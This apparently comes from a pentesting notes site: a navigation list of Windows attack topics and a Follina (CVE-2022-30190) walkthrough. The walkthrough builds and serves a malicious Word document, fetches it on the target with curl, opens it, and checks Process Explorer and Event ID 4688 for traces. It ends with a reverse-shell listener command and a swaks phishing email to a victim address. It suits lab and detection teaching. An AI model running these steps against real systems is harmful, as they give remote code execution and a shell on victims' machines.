Active Directory

AD CS (Active Directory Certificate Services) Pentesting

AS-REP Roasting

Active Directory Pentesting

Constrained Delegation Attack

DACL (Discretionary Access Control List) Attack

Kerberoasting Attack

Kerberos Pentesting

LAPS (Local Administrator Password Solution) Pentesting

LDAP (Lightweight Directory Access Protocol) Pentesting

LDAP Injection

Netlogon Elavasion of Privilege

Resource-Based Constrained Delegation Attack

SMB (Server Message Block) Pentesting

Shadow Credentials

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting

RDP (Remote Desktop Protocol) Pentesting

WinRM (Windows Remote Management) Pentesting

Service

Iperius Backup Service Privilege Escalation

M365 (Microsoft Office 365) Pentesting

ManageEngine ADSelfService Plus PrivEsc

Microsoft Outlook Message (.msg)

Microsoft Word Pentesting

Windows Print Spooler Service

Windows PrivEsc with Unquoted Service Path

Privilege Escalation

Activate Administrator Account on Windows

Add/Edit/Delete Users on Windows

Dumping Credentials from Windows Vault

Dumping Windows Password Hashes

Iperius Backup Service Privilege Escalation

ManageEngine ADSelfService Plus PrivEsc

Mimikatz

Outlook Reminder Privilege Escalation

Switch User on Windows

UAC Windows Privilege Escalation

Windows PrivEsc with AD CS

Windows PrivEsc with DLL Hijacking

Windows PrivEsc with Kerberos

Windows PrivEsc with LocalPotato

Windows PrivEsc with Registry Keys

Windows PrivEsc with RemotePotato

Windows PrivEsc with SeBackupPrivilege

Windows PrivEsc with Unquoted Service Path

Windows Privilege Escalation

Post Exploitation

Windows Pivoting

Forensics

Reading OneDrive Logs

Windows Disk Management

Windows Forensics

Windows Memory Dump Analysis

Windows XML EventLog (EVTX)

PowerShell

PowerView

WSL

WSL Pentesting

Technique

Download Files in Windows

Microsoft Word Pentesting

Last modified: 2022-11-20

Windows

Follina MSDT (CVE-2022-30190)

Microsoft Support Diagnostic Tool (MSDT) is vulnerable with Follina.

1. Download the Payload in Local Machine

Clone the payload from msdt-follina.

2. Create the Maldoc in Local Machine

# -i: interface name
python3 follina.py -i eth0

Then a new maldoc named “follina.doc” will be created in the current directory.
Now you’ve started the web server.

3. Open Another Web Server in Local Machine

Open another terminal and move to the msdt-follina directory, then start web server to transfer the maldoc to target machine.

python3 -m http.server 3456

4. Transfer the Maldoc to Target Machine

In target Windows machine, open powershell and execute the following command.

cd ~/Desktop
curl http://<local-ip>:3456/follina.doc -o follina.docx

5. Open the Maldoc

In target machine, open the maldoc you transfered.

.\follina.docx

6. Check the Process Explorer of Sysinternals in Target Machine

Find interesting processes in the Process Explorer.

7. Check the Event Viewer in Target Machine to Detect Suspicious Processes

Go to "View" -> "Use Quick Filter"
A search bar should appear on top of the logs. Choose “Find Event ID” on the right of the search bar, and enter “4688”(it means that “a new process has been created”) in a search bar.
Open the Find (Ctrl+F) and enter “winword”. Then check the contents of results.
Go to Options → Advanced Options

Reverse Shell via SMTP

If the target uses SMTP, you may be able to reverse shell using it.
Start the exploit to wait for reverse connections.

sudo python3 follina.py -i tun0 -p 80 -r 4444

Send e-mail to the target machine via SMTP using swaks.

swaks --to victim@vulnerable.com --from test@test --server mail.vulnerable.com --body "http://<local-ip>/"

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Microsoft Word Pentesting

ON THIS PAGE